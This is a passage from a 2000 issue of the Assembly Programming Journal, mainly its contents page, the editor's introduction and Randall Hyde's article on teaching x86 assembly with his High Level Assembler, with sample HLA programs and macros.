inc ecx ; ecx = -lenSrchData
jz Found ; if ecx = 0 Found&Exit
cmp al, [ebp+ecx-1] ; ebp->pBuffer
jnz Not_equal ;
inc ecx ; ecx = -lenSrchData
jz Found ; if ecx = 0 Found&Exit
cmp ah, [ebp+ecx-1] ; ebp->pBuffer
jnz Not_equal ;
inc ecx ; ecx = -lenSrchData
jz Found ; if ecx=0 Found&Exit
shr eax, 16 ;
inc ecx ;
cmp al, [ebp+ecx-2] ; ebp->pBuffer
jnz Not_equal ;
test ecx, ecx ; ecx = -lenSrchData
jz Found ; if ecx=0 Found&Exit
cmp ah, [ebp+ecx-1] ; ebp->pBuffer
jz Compare ;
Not_equal: ;
sub eax, eax ; eax = 0
sub ebp, esi ; restore ebp->current negative index
jl Search ; end of pBuffer control
Not_found: ;
or eax, -1 ; Exit with flag Not_Found eax=-1
ret ;
Found: ;
lea eax, [ebp+edx] ; in eax->pointer to 1st
ret ; occurrence of data found in pBuffer
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Mar 00-Aug
00
:::\_____\::::::::::. Issue
8
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.comasmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Teaching Assembly Language Using HLA"....................Randall.Hyde
"Processor Identification - Part II"..............Chris Dragan.&.Chili
"The LCC Intrinsics Utility"...............................Jacob.Navia
"Accessing COM Objects from Assembly"....................Ernest.Murphy
"64-bit Integer/ASCII Conversion"............................X-Calibre
Column: Win32 Assembly Programming
"Win32 AppFatalExit Skeleton"................................Chili
Column: The Unix World
"System Calls in FreeBSD".........................G.Adam.Stanislav
"Loadable Kernel Modules"..................................mammon_
Column: Gaming Corner
"Win32 ASM Game Programming"...........................Chris.Hobbs
Column: Assembly Language Snippets
"SEH.INC"................................................X-Calibre
"SEH.ASM"................................................X-Calibre
Column: Issue Solution
"BCD_Conv"...........................................Angel.Tsankov
----------------------------------------------------------------------
+++++++++++++++++++Issue Challenge++++++++++++++++++
Convert a two-digit BCD to hexadecimal
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by
mammon_
I cannot begin to count the number of subtle and overt hints I have received
that this issue is by far the most tardy APJ release to date. Quite a few
projects have conspired to steal my time away, from Linux essays to
disassembler coding to reverse engineering a hardware/software combo thrown
together by a madman bent on carrying the technology to his grave. Enough to
say, though, that the issue is finally ready for distribution. Not only
that,
but I actually have about four article left over --including Part II of the
ASM
Gaming series-- to include in APJ 9.
The articles in this issue encompass a wide range of topics, from
customizing
the LCC compiler to programming games in asm. Randall Hyde, who I'm sure
needs
no introduction to assembly coders, has provided an excellent article
discussing the teaching of assembly language, and how he developed HLA to
assist. Chili has done a fair amount of work as well, working on everything
from CPU identification and exception handling to preparing an online gaming
article for ASCII publication.
X-Calibre has provided two complete programming packages, one for exception
handling and one for converting 64-bit integers; an introductory COM article
which further demystifies COM has been provided by Ernest Murphy. The Unix
camp
is doubly represented this month, with an introduction to FreeBSD assembly
language [using NASM, of course] and my linux article deferred from the
previous issue. Capping everything off is a quick challenge and solution
provided by Angel Tsankov.
It has been suggested to me many times during the Time Of No Issues that I
should acquire a staff for ensuring that the issues get out on time. I am
open
to suggestions in this area; anyone willing to volunteer their time on a
regular basis is welcome to contact me. Ideally, the mag should have a staff
that solicits articles [hint IRC hint], tests the code in each article, and
edits the articles to enforce formatting [80 col, 3sp tab] and commenting
standards. To date I've been doing the last one only, and as is readily
apparent I put it off as long as possible.
Another note, regarding mirrors. Translation of the APJ issues is perfectly
acceptable and highly encouraged; all I request is an email giving the URL
so
I can link to it from the main page. I should point out that the individual
articles, once removed from the context of the APJ issue, are the property
of
their individual authors, so contact them before 'repackaging'. Regarding
formatting, I have also received a few requests to reformat APJ in HTML or
another markup language to make reading and browsing easier. This I will not
do, for it makes APJ less portable and causes problems copying code from the
magazine to a source file. I have been working on syntax highlighting/tag
files
for vi and nedit; I will post these and any user-contributed translation
files
[e.g. APJ_to_HTML] on the main APJ website.
All pleading and excuses aside, issue 8 is now put to bed, and issue 9 will
be
out faster than you can recite GNU's license agreement. Enjoy the mag...
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Teaching Assembly Language Using
HLA
by Randall Hyde
I first began teaching assembly language programming at Cal Poly Pomona in
the
Winter Quarter of 1987. I quickly discovered that good pedagogical material
was difficult to come by; even the textbooks available for the course left
something to be desired. As a result, my students were learning very little
assembly language in the ten weeks available to the course. After about two
quarters, I decided to do something about the textbook problem, so I began
writing a text I entitled "How to Program the IBM PC Using 8088 Assembly
Language" (obviously, this was back in the days when schools still used PCs
made by IBM and the main CPU you could always count on was the 8088). "How
to
Program..." became the epitome of a "work in progress." Each quarter I
would
get feedback from the students, update the text, and give it to Kinko's (and
the UCR Printing and Reprographics Department) to run off copies for my
students the very next quarter.
The original "How to Program..." text provided a basic set of library
routines
to print strings, input characters and lines of text, and a few other basic
functions. This allowed the students to quickly begin writing programs
without
having to learn about the INT instruction, DOS, or BIOS. However, I
discovered
that students were spending a significant time each quarter writing their
own
numeric conversion routines, string manipulation routines, etc. One student
commented on "how much easier it was to program in 'C' than assembly
language
since all those conversions and string operations were built into the
language." I replied that the real savings were due more to the 'C'
standard
library than the language itself and that a comparable library for assembly
language programmers would make assembly language programming almost as easy
as
'C' programming. At that moment a little light when on in my head and I sat
down and wrote the first few routines of what ultimately became the "UCR
Standard Library for 80x86 Assembly Language Programmers" (You can still get
a
copy of the UCR stdlib from webster at the URL given above). As I finished
each group of routines in the standard library, I incorporated them into my
courses. This reaped immediate benefits as students spent less time writing
numeric conversion routines and spent more time learning assembly language.
My
students were getting into far more advanced topics than was possible before
the advent of the UCR Stdlib.
In the early 1990's, the 8088 CPU finally died off and IBM was no longer the
major supplier of PCs. Not only was it time to change the title of my text,
but I needed to update references to the 8088 (that were specific to that
chip)
and bring the text into the world of the 80386 and 80486 processors. DOS
was
still King and 16-bit code was still what everyone was writing, but issues
of
optimization and the like were a little outdated in the text. In addition
to
the changes reflecting the new Intel CPUs, I also incorporated the UCR
Standard
Library into the text since it dramatically improved the speed at which
students progressed beyond the basic assembly programming skills. I
entitled
the new version of the text "The Art of Assembly Language Programming," an
obvious knock-off of Knuth's series ("The Art of Computer Programming").
In early 1996 it became obvious to me that DOS was finally dying and I
needed
to modify "The Art of Assembly Language Programming" (AoA) to use Windows as
the development platform. I wasn't interested in having students write
Windows
GUI applications in assembly language (the time spent teaching
event-oriented
programming would interfere with the teaching of basic machine organization
and
assembly language programming), but it was clear that the days of writing
code
that arbitrarily pokes around in memory and accesses I/O addresses directly
(things that AoA taught) were nearly over. So I decided to get started on a
new version of AoA that used Windows as the basic development environment
with
the emphasis on writing console applications. The UCR Standard Library was
the
single most important pedagogical tool I'd discovered that dramatically
improved my students' progress. As I began work on a new version of AoA for
Windows 3.1 my first task was to improve upon the UCR Standard Library to
make
it even easier to use, more flexible, more efficient, and more "high level."
After six months of part time work I eventually gave up on the UCR Stdlib
v2.0.
The idea was right, unfortunately the tools at my disposal (specifically,
MASM
6.11) weren't quite up to the task at hand. I was writing some really
tricky
macros, obviously exploiting code inside MASM that Microsoft's engineers had
never run (i.e., I discovered lots of bugs). I would code in some
workarounds
to the defects only to have the macro package break at the next minor patch
of
MASM (e.g., from MASM 6.11a to MASM 6.11b). There was also a robustness
issue.
Although MASM's macro capabilities are quite powerful and it almost let me
do
everything I wanted, it was very easy to confuse the macro package and then
MASM would generate some totally weird (but absolutely correct) diagnostic
messages that correctly described what was going wrong in the macro but made
absolutely no sense whatsoever at all to a beginning assembly language
student
who use using the macro to print some data to the console device. As it
became
clear that the UCR Stdlib v2.0 would never be robust enough for student use,
I
decide to take a different approach.
About this time, I was talking with my Department Chair about the assembly
language course. We were identifying some of the problems that students had
learning assembly language. One problem, of course, was the paradigm shift
-
learning to solve problems using machine language rather than a high level
language. The second problem we identified is that students get to apply
very
little of what they've learned from other courses to the assembly language
class. A third problem was the primitive tools available to assembly
language
programmers. Energized by this discussion, I decided to see how I could
solve
these problems and improve the educational process.
Problem one, the paradigm shift, had to be handled carefully. After all,
the
whole purpose of having students take an assembly language programming
course
in the first place is to acquaint them with the low-level operation of the
machine. However, I felt it was certainly possible to redefine parts of
assembly language so that would be more familiar to students. For example,
one
might test the carry flag after an addition to determine if an unsigned
overflow has occurred using code like the following:
add eax, 5
jnc NoOverflow
<< code to execute if overflow occurs >>
NoOverflow:
Although this code is fairly straight-forward, you would be surprised how
many
students cannot visualize this code on their own. On the other hand, if you
feed them some pseudo code like:
add eax, 5
if( the carry flag is set ) then
<< code to execute if overflow occurs >>
endif
those same students won't have any problems understanding this code. To
take
advantage of this difference in perspective, I decided to explore changing
the
definition of assembly language to allow the use of the "if condition then
do
something" paradigm rather than the "if a condition is false them skip over
something" paradigm. Fundamentally, this does not change the material the
student has to learn; it just presents it from a different point of view to
which they're already accustomed. This certainly wasn't a gigantic leap
away
from assembly language as it existed in 1996. After all, MASM and other
assemblers were already allowing statements like ".if" and ".endif" in the
code. So I tried these statements out on a few of my students. What I
discovered is that the students picked up the basic "high level" syntax very
rapidly. Once they mastered the high level syntax, they were able to learn
the
low-level syntax (i.e., using conditional jumps) faster than ever before.
What
I discovered is something that Nicoderm CQ is pushing for their smoking
cessation program: "learning assembly language in graduated steps (from high
level to low level) is easier than going about it 'cold turkey.'"
The second problem, students not being able to leverage their programming
skills from other classes, is largely linked to the syntax of Intel x86
assembly language. Many skills students pick up, such as programming style,
indentation, appropriate programming construct selection, etc., are useless
in
a typically assembly language class. Even skills like commenting and
choosing
good variable names are slightly different in assembly language programs.
As a
result, students spend considerable (unproductive) time learning the new
"rules
of the game" when writing assembly language programs. This directly equates
to
less progress over the ten week quarter. Ideally, students should be able
to
applying knowledge like program style, commenting style, algorithm
organization, and control construct selection they learned in a C/C++ or
Pascal
course to their assembly language programs. If they could, they'd be "up
and
writing" in assembly language much faster than before.
The third problem with teaching assembly language is the primitive state of
the
tools. While MASM provides a wonderful set of high level language control
constructs, very little else about MASM supports this "brave new world" of
assembly language I want to teach. For example, MASM's variable
declarations
leave a lot to be desired (the syntax is straight out of the 1960's). As I
noted earlier, as powerful as MASM's macro facilities are, they weren't
sufficient to develop a robust library package for my students. I briefly
looked at TASM, but it's "ideal" mode fared little better than MASM.
Likewise,
while development environments for high level languages have been improving
by
leaps and bounds (e.g., Delphi and C++ Builder), assembly language
programmers
are still using the same crude command line tools popularized in the early
1970's. Codeview, which is practically useless under Windows, is the most
advanced tool Microsoft provides specifically for assembly language
programmers.
Faced with these problems, I decided the first order of business was to
create
a new x86 assembly language and write a compiler for it. I decided to give
this language the somewhat-less-than-original name of "the High Level
Assembler," or HLA (IBM and Motorola both already have assemblers that use a
variant of this name). It took three years, but the first version of HLA
was
ready for public consumption in September of 1999.
I began using HLA in my CS 61 course (machine organization and assembly
language programming) at UCR in the Fall Quarter, 1999. With no pedagogical
material other than a roughly written reference guide to the language, I was
expecting a complete disaster. It turns out that I was pleasantly
surprised.
Although the students did have major problems, the course went far more
smoothly than I anticipated and we managed to cover about the same material
I
normally covered when using MASM.
Although things were going far better than I expected, this is not to say
that
things were going great, or even as smoothly as I would have liked. The
major
problem, of course, was the lack of a textbook. The only material the
students
had to study from were their lecture notes. Clearly something needed to be
done about this. Of course, the whole reason for spending three years
writing
HLA was to allow me to write a new version of AoA. So in November, 1999, I
began work on the new edition of the text. By the start of the Winter
Quarter
in January, 2000, I had roughed together five chapters, about 50% of the
material was brand new, the other 50% was cut, pasted, and updated from the
older version of the text. During the quarter I rushed out two more
chapters
bringing the total to seven. The Winter Quarter went far more smoothly than
the Fall Quarter. Student projects were much better and the progress of the
class outstripped any assembly language course I'd taught prior to that
point.
Clearly the class was benefiting from the use of HLA.
By the start of the Spring Quarter in April, 2000, I'd managed to make one
proofreading pass over the first six chapters and I'd written the first
draft
of the eighth chapter. With a bit of luck, I will have the first draft of
the
text ready by the end of Summer, 2000. At that time I intend to "shop" the
text around to a set of publishers so other schools can benefit from the
work.
Well, this has been a long-winded report of HLA's justification. You're
probably wondering what HLA is and whether it is applicable to you
(especially
if you're a programmer rather than an educator). Fair enough, the rest of
this
article will discuss the HLA system and how you would use it.
HLA is a technically a compiler, not an assembler. HLA v1.x converts an HLA
source file into a MASM-compatible assembly language source file. This MASM
file is then assembled and linked to produce a Win32 executable file. The
HLA
compiler automatically runs the assembler and linker, so these steps are
transparent to the HLA user (other than the few extra seconds it takes to
assemble and link the output file). This whole process takes only a few
seconds (for example, compiling, assembling, and linking the 750-line
"x2p.hla"
program in the HLA examples directory only takes about two seconds on a 266
MHz
Pentium II system with UW SCSI drives). I am planning to emit object code
directly in version 2.0 of HLA. Until then, an HLA user will need
Microsoft's
MASM and linker. For those who would prefer to have HLA generate code for
TASM, NASM, or some other assembler, the HLA compiler source code is
available,
have fun :-).
HLA is a Win32 console application and it generates Win32 applications. By
default, it generates console applications although it does not restrict you
to
writing console applications under Windows. There is absolutely no support
for
DOS applications. While it is possible to write Linux applications with
only
minor changes to HLA, the development process for Linux applications is
convoluted and hardly worthwhile. HLA v2.0 will address portability across
32-bit x86 operating systems. For now, using HLA is practical only under
Win32
OSes (Win 95, 98, NT, and 2000).
When designing the HLA language, I chose a syntax that is very similar to
common imperative high level languages like Pascal/Delphi, Ada, Modula-2,
FORTRAN77, C/C++, and Java. That is not to say that HLA compiles Pascal
programs, but rather, a Pascal programmer will note many similarities
between
Pascal and HLA (and ditto for the other languages). HLA stole many of the
ideas for data declarations from the Algol based languages (Pascal,
Modula-2,
and Ada), it grabbed the ideas for many of its control structures from
FORTRAN77, Ada, and C/C++/Java, and the structure of the HLA Standard
Library
is based on the C Standard Library. So regardless of which high level
language
you're most comfortable with in this set, you'll certainly recognize some
elements of your favorite HLL in HLA.
A carefully written HLA program will look almost exactly like a high level
language program. Consider the following sample program:
program SampleHLApgm;
#include( "stdlib.hhf" )
const
HelloWorld := "Hello World";
begin SampleHLApgm;
stdout.put( "The classical 'Hello World' program: ", HelloWorld, nl );
end SampleHLApgm;
This program does the obvious thing. Anyone with any high level language
background can probably figure out everything except the purpose of "nl"
(which
is the newline string imported by the standard library). This certainly
doesn't look like an assembly language program; there isn't even a real
machine instruction in sight. Of course, this is a trivial example;
nonetheless, I've managed to write reasonable HLA programs that were just
over
1,000 lines of code that contained only one or two identifiable machine
language instructions. If it's possible to do this, how can I get away with
calling HLA an assembly language?
The truth is, you can actually write a very similar looking program with
MASM.
Here's an example I trot out for unbelievers. This code is compilable with
MASM (assuming you include the UCR Standard Library v2.0 and some additional
code I've cut out for brevity:
var
enum colors,<red,green,blue>
colors c1, c2
endvar
Main proc
mov ax, dseg
mov ds, ax
mov es, ax
MemInit
InitExcept
EnableExcept
finit
try
cout "Enter two colors:"
cin c1, c2
cout "You entered ",c1," and ",c2,nl
.if c1 == red
cout "c1 was red"
.endif
except $Conversion
cout "Conversion error occured",nl
except $Overflow
cout "Overflow error occured",nl
endtry
CleanUpEx
ExitPgm ;DOS macro to quit program.
Main endp
As you can see, the only identifiable machine instructions here are the ones
that initialize the segment registers at the beginning of the program (which
is
unnecessary in a Win32 environment). So let me blunt criticism from
"die-hard"
assembly fans right at the start: HLA doesn't open up all kinds of new
programming paradigms that weren't possible before. With some really clever
macros (e.g., enum, cout, and cin in the MASM code), it is quite possible to
do
some really amazing things. If you're wondering why you should bother with
HLA
if MASM is so wonderful, don't forget my comments about the robustness of
these
macros. Both HLA and MASM (with the UCR Standard Library v2.0) work great
as
long as you write perfect code and don't make any mistakes. However, if you
do
make mistakes, the MASM macro scheme gets ugly real quick.
The "die-hard" assembly fan will probably make the observation that they
would
never write code like the MASM code I've presented above; they would write
traditional assembly code. They want to write traditional code. They don't
want this high level syntax forced upon them. Well, HLA doesn't force you
to
use high level control structures rather than machine instructions. You can
always write the low level code if you prefer it that way. Here is the
original HLA program rewritten to use familiar machine instructions:
program SampleHLApgm2;
#include( "stdlib.hhf" )
data
dword 37, 37;
TcHWpStr: dword;
byte "The classical 'Hello World' program: ",0,0,0;
dword 11, 11;
HWstr: dword;
byte "Hello World",0;
begin SampleHLApgm2;
lea( eax, TcHWpStr );
push( eax );
call stdout.puts;
lea( eax, HWstr );
push( eax );
call stdout.puts;
call stdout.newln;
end SampleHLApgm2;
The stdout.puts and stdout.newln procedures come from the HLA Standard
Library.
I will leave it up to the interested reader to translate these into Win API
Write calls if this code isn't sufficiently low level to satisfy. Note that
HLA strings are not simple zero terminated strings like C/C++. This
explains
the extra zeros and dword values in the DATA section (the dword values hold
the
string lengths; I offer these without further explanation, see the HLA
documentation for more details on HLA's string format).
One thing you've probably noticed from this second example is that HLA uses
a
functional notation for assembly language statements. That is, the
instruction
mnemonics look like function calls in a high level language and the operands
look like parameters to those functions. The neat thing about this notation
is
that it easily allows the use of "instruction composition." Instruction
composition, like functional composition, means that you get to use one
instruction as the operand of another. For example, an instruction like
"mov(
mov( 0, eax ), ebx );" is perfectly legal in HLA. The HLA compiler will
compile the innermost instruction first and then substitute the destination
operand of the innermost instruction for the operand position occupied by
the
instruction. HLA's MOV instruction takes the generic form "MOV( source,
destination );" so the former instruction translates to the following two
instruction sequence:
mov( 0, eax ); // intel syntax: mov eax, 0
mov( eax, ebx ); // intel syntax: mov ebx, eax
By and of itself, instruction composition is somewhat interesting, but
programmers striving to write readable code need to exercise caution when
using
instruction composition. It is real easy to write some really unreadable
code
if you abuse instruction composition. E.g., consider:
mov( add( mov( 0, eax ), sub( ebx, ecx)), edx ), mov( i, esi ));
Egads! What does this mess do? Some might consider the inclusion of
instruction composition in HLA to be a fault of the language if it allows
you
to write such unreadable code. However, I've never felt it was the language
syntax's job to enforce good programming style. If there's really a reason
for
writing such messy code, the compiler shouldn't prevent it.
Although you can produce some truly unreadable messes with instruction
composition, if you use it properly it can enhance the readability of your
programs. For example, HLA lets you associate an arbitrary string with a
procedure that HLA will substitute for that procedure name when the
procedure
call appears as an operand of another instruction. Most functions that
return
a value in a register specify that register name as their "returns" string
(the
string HLA substitutes for the procedure call). For example, the "str.eq(
str1, str2)" function compares the two string operands and returns true or
false in AL depending on the result of the comparison. This allows you to
write code like the following:
if( str.eq( str1, "Hello" )) then
stdout.put( "str1 = 'Hello'" nl );
endif;
HLA directly translates the IF statement into the following sequence:
str.eq( str1, "Hello" );
if( al ) then
stdout.put( "str1= 'Hello'" nl );
endif;
(If a register name appears where a boolean expression is expected, as AL
does
in the IF statement above, HLA emits a TEST instruction to see if the
register
contains a non-zero value.)
Arguably, the former version is a little more readable than the latter
version.
Instruction composition, when you use it in this fashion, lets you write
code
that "looks" a little more high level without the compiler having to
generate
lots of extra code (as it would if HLA supported a generalized arithmetic
expression parser).
Like MASM, HLA supports a wide variety of high level control structures.
HLA's
set is both higher level and lower level at the same time. There are two
reasons HLA's control structures aren't always as powerful as MASM's.
First,
with the sole exception of object method invocations, I made a rule that
HLA's
high level control structures would not modify any general purpose registers
behind the programmer's back. MASM, for example, may modify the value in
EAX
for certain boolean expressions it must compute. Second, remember that the
primary goal of HLA is to teach assembly language; yes, it's supposed to
ease
the learning curve, but still the goal is to teach assembly language. It is
possible to get carried away with the high level language features and then
wind up with an "assembler" that lets students write their assembly language
programs in a high level language. In my opinion, MASM went too far with
what
it allows for boolean expressions. HLA, for example, doesn't allow the use
of
the conjunctive and disjunctive operators ( "&&" and "||") in boolean
expressions. I expect my students to generate the appropriate sequence of
low
level instructions themselves. In general, most HLA boolean expressions
compile into two instructions: a CMP and a conditional jump. I didn't want
to
go any farther than this because that would allow the students to avoid
learning how to write this code for themselves.
Although I designed HLA as a tool to teach assembly language programming,
this
is also a tool that I intend to use so I included lots of goodies for
advanced
assembly language programmers. For example, HLA's macro facilities are more
powerful than I've seen in any programming language based macro processor.
One
unique feature of HLA's macro preprocessor is the ability to create "context
free" control structures using macros. For example, suppose that you decide
that you need a new type of looping construct that HLA doesn't provide;
let's
say, a loop that will repeat once for each character in a string supplied as
a
parameter to the loop. Let's call this loop "OnceForEachChar" and decide
on
the following syntax:
OnceForEachChar( SomeString )
<< Loop Body >>
endOnceForEachChar;
On each iteration of this loop, the AL register will contain the
corresponding
character from the string specified as the OnceForEachChar operand. You can
easily implement this loop using the following HLA macro:
macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;
pushd( -1 ); // index into string.
TopOfLoop:
inc( (type dword [esp] )); // Bump up index into string.
#if( @IsConst( SomeString ))
lea( eax, SomeString ); // Load address of string constant
into EAX.
#else
mov( SomeString, eax ); // Get ptr to string.
#endif
add( [esp], eax ); // Point at next available
character
mov( [eax], al ); // Get the next available character
cmp( al, 0 ); // See if we're at the end
of the string
je LoopExit;
terminator endOnceForEachChar;
jmp TopOfLoop; // Return to the top of the loop and repeat.
LoopExit:
add( 4, esp ); // Remove index into string from stack.
endmacro;
Anyone familiar with MASM's macro processor should be able to figure out
most
of this code. Note that the symbols "TopOfLoop" and "LoopExit" are local
symbols to this macro. Hence, if you repeat this macro several times in the
code, HLA will emit different actual labels for these symbols to the MASM
output file. The "@IsConst" is an HLA compile-time function that returns
true
if its operand is a constant. Obtaining the address for a constant is
fundamentally different than obtaining the address of a string variable
(since
HLA string variables are actually pointers to the string data). The most
interesting feature of this macro definition is the "terminator" line. This
actually defines a second macro that is active only after HLA encounters the
"OnceForEachChar" macro and control returns to the first statement after the
OnceForEachChar invocation. Invocation of "context free" macros always
occur
in pairs; that is, for every "OnceForEachChar" invocation there must be a
matching "endOnceForEachChar" invocation. The following program
demonstrates
this macro in use, it also demonstrates that you can nest this newly created
control structure in your program:
program SampleHLApgm3;
#include( "stdlib.hhf" )
macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;
pushd( -1 ); // index into string.
TopOfLoop:
inc( (type dword [esp] ));
#if( @IsConst( SomeString ))
lea( eax, SomeString );
#else
mov( SomeString, eax );
#endif
add( [esp], eax );
mov( [eax], al );
cmp( al, 0 );
je LoopExit;
terminator endOnceForEachChar;
jmp TopOfLoop;
LoopExit:
add( 4, esp );
endmacro;
static
strVar: string := ":" nl;
begin SampleHLApgm3;
OnceForEachChar( "Hello" )
stdout.putc( al );
OnceForEachChar( strVar )
stdout.putc( al );
endOnceForEachChar;
endOnceForEachChar;
end SampleHLApgm3;
This program produces the output:
H:
e:
l:
l:
o:
Here's the MASM code the compiler emits for the sequence above (the
"strings"
segment was moved for clarity):
strings segment page public 'data'
align 4
?635_len dword 5
dword 5
?635_str byte "Hello",0,0,0
strings ends
pushd -1
?634__0278_:
inc dword ptr [esp+0] ;(type dword [esp])
lea eax, ?635_str
add eax, [esp+0] ;[esp]
mov al, [eax+0] ;[eax]
cmp al, 0
je ?636__0279_
push eax
call stdio_putc ;putc
pushd -1
?639__027d_:
inc dword ptr [esp+0] ;(type dword [esp])
mov eax, dword ptr ?630_strVar[0] ;strVar
add eax, [esp+0] ;[esp]
mov al, [eax+0] ;[eax]
cmp al, 0
je ?640__027e_
push eax
call stdio_putc ;putc
jmp ?639__027d_
?640__027e_:
add esp, 4
jmp ?634__0278_
?636__0279_:
add esp, 4
In addition to the "terminator" clause, HLA macros also support a "keyword"
clause that let you bury reserved words within a context-free language
construct. For example, the HLA language does not provide a SWITCH/CASE
statement. This omission was intentional. Rather than build the
SWITCH/CASE
statement into the HLA language, I implemented the SWITCH .. CASE .. DEFAULT
..
ENDCASE statement using HLA's macro facilities (as a demonstration of HLA's
power). An HLA SWITCH statement takes the following form:
switch( reg32 )
case( constantList1 )
<< statements >>
case (constantList2 )
<< statements >>
.
.
.
default // This is optional
<< statements >>
endswitch;
The switch macro implements the "switch" and "endswitch" reserved words
using
the macro and terminator clauses in the macro declaration. It implements
the
"case" and "default" reserved words using the HLA "keyword" clause in a
macro
definition. The "keyword" clause is similar to the "terminator" clause
except
it doesn't force the end of the macro expansion in the invoking code. The
actual code for the HLA SWITCH statement is a little too complex to present
here, so I will extend the example of the OnceForEachChar macro to
demonstrate
how you code use the "keyword" clause in a macro.
Let's suppose you wanted to add a "_break" clause to the "OnceForEachChar"
loop
( I'm using "_break" with an underscore because "break" is an HLA reserved
word). You could easily modify the "OnceForEachChar" macro to achieve this
by
using the following code:
macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;
pushd( -1 ); // index into string.
TopOfLoop:
inc( (type dword [esp] ));
#if( @IsConst( SomeString ))
lea( eax, SomeString );
#else
mov( SomeString, eax );
#endif
add( [esp], eax );
mov( [eax], al );
cmp( al, 0 );
je LoopExit;
keyword _break;
jmp LoopExit;
terminator endOnceForEachChar;
jmp TopOfLoop;
LoopExit:
add( 4, esp );
endmacro;
The "keyword" clause defines a macro ("_break") that is active between the
"OnceForEachChar" and "endOnceForEachChar" invocations. This macro simply
expands to a jmp instruction that exits the loop. Note that if you have
nested
"OnceForEachChar" loops and you "_break" out of the innermost loop, the code
only jumps out of the innermost loop, exactly as you would expect.
HLA's macro facilities are part of a larger feature I refer to as the "HLA
Compile-Time Language." HLA actually contains a built-in interpreter than
executes while it is compiling your program. The compile-time language
provides conditional compilation ( the #IF..#ELSE..#ENDIF statements in the
previous example), interpreted procedure calls (macros), looping constructs
(#WHILE..#ENDWHILE), a very powerful constant expression evaluator,
compile-time I/O facilities (#PRINT, #ERROR, #INCLUDE, and #TEXT..#ENDTEXT),
and dozens of built-in compile time functions (like the @IsConst function
above).
The HLA built-in string functions (not to be confused with the HLA Standard
Library's string functions) are actually powerful enough to let you write a
compiler for a high level language completely within HLA. I mentioned
earlier
that it is possible to write an expression compiler within HLA; I was
serious.
The HLA compile-time language will let you write a sophisticated recursive
descent parser for arithmetic expressions (and other context-free language
constructs, for that matter).
HLA is a great tool for creating low-level Domain Specific Embedded
Languages
(DSELs). DSELs are mini-languages that you create on a project by project
basis to help reduce development time. HLA's compile time language lets you
create some very high level constructs. For example, HLA implements a very
powerful string pattern matching language in the "patterns" module found in
the
HLA Standard Library. This module lets you write pattern matching programs
that use techniques found in language like SNOBOL4 and Icon. As a final
example, consider the following HLA program that translate RPN (reverse
polish
notation) expressions into their equivalent assembly language (HLA)
statements
and displays the results to the standard output:
// This program translates user RPN input into an
// equivalent sequence of assembly language instrs (HLA fmt).
program RPNtoASM;
#include( "stdlib.hhf" );
static
s: string;
operand: string;
StartOperand: dword;
macro mark;
mov( esi, StartOperand );
endmacro;
macro delete;
mov( StartOperand, eax );
sub( eax, esi );
inc( esi );
sub( s, eax );
str.delete( s, eax, esi );
endmacro;
procedure length( s:string ); returns( "eax" ); nodisplay;
begin length;
push( ebx );
mov( s, ebx );
mov( (type str.strRec [ebx]).length, eax );
pop( ebx );
end length;
begin RPNtoASM;
stdout.put( "-- RPN to assembly --" nl );
forever
stdout.put( nl nl "Enter RPN sequence (empty line to quit): " );
stdin.a_gets();
mov( eax, s );
breakif( length( s ) = 0 );
while( length( s ) <> 0 ) do
pat.match( s );
// Match identifiers and numeric constants
mark;
pat.zeroOrMoreWS();
pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
pat.a_extract( operand );
stdout.put( " pushd( ", operand, " );" nl );
strfree( operand );
delete;
pat.alternate;
// Handle the "+" operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '+' );
stdout.put
(
" pop( eax );" nl
" add( eax, [esp] );" nl
);
delete;
pat.alternate;
// Handle the '-' operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '-' );
stdout.put
(
" pop( eax );" nl
" pop( ebx );" nl
" sub( eax, ebx );" nl
" push( ebx );" nl
);
delete;
pat.alternate;
// Handle the '*' operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '*' );
stdout.put
(
" pop( eax );" nl
" imul( eax, [esp] );" nl
);
delete;
pat.alternate;
// handle the '/' operator.
mark;
pat.zeroOrMoreWS();
pat.oneChar( '/' );
stdout.put
(
" pop( ebx );" nl
" pop( eax );" nl
" cdq(); " nl
" idiv( ebx, edx:eax );" nl
" push( ebx );" nl
);
delete;
pat.if_failure
// If none of the above, it must be an error.
stdout.put( nl "Illegal RPN Expression" nl );
mov( s, ebx );
mov( 0, (type str.strRec [ebx]).length );
pat.endmatch;
endwhile;
endfor;
end RPNtoASM;
Consider for a moment the code that matches an identifier or an integer
constant:
mark;
pat.zeroOrMoreWS();
pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
pat.a_extract( operand );
stdout.put( " pushd( ", operand, " );" nl );
strfree( operand );
delete;
The "mark;" invocation saves a pointer into the "s" string where the current
identifier starts. The pat.ZeroOrMoreWS pattern matching function skips
over
zero or more whitespace characters. The pat.OneOrMoreCset pattern match
function matches one or more alphanumeric and underscore characters (a crude
approximation for identifiers and integer constants). The pat.a_extract
function makes a copy of the string between the "mark" and the "a_extract"
calls (this corresponds to the whitespace and identifier/constant). The
stdout.put statement emits the HLA machine instruction that will push this
operand on to the x86 stack for later computations. The remaining
statements
clean up allocated string storage space and delete the matched string from
"s".
Although the "pat.xxxxx" statements look like simple function calls, there's
actually a whole lot more going on here. HLA's pattern matching facilities,
like SNOBOL4 and Icon, support success, failure, and backtracking. For
example, if the pat.oneOrMoreChar function fails to match at least one
character from the set, control does not flow down to the pat.a_extract
